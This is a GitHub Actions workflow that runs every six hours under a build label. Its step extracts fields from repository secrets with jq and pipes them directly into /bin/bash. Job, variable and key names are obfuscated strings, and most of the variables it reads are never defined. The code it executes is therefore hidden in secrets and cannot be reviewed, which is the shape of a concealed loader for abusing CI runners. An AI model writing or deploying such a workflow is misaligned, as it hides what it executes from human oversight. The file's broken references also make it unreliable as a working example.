name: bomaozhongqian

on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: bomaozhongqian
        env:
          wairk6: ${{ secrets.wairk6 }}
        run: |
          echo $wairk6 | jq -r .sk5572 | /bin/bash
          echo $hq00556 | jq -r .dl1121 | /bin/bash
          echo $n352 | jq -r .b6 | /bin/bash
          echo $if84 | jq -r .n51 | /bin/bash
          echo $c35719 | jq -r .opi4 | /bin/bash
          echo $hdsh70584 | jq -r .bq1 | /bin/bash
          echo $j1200 | jq -r .zf895 | /bin/bash
          echo $m744 | jq -r .hxbgv52390 | /bin/bash

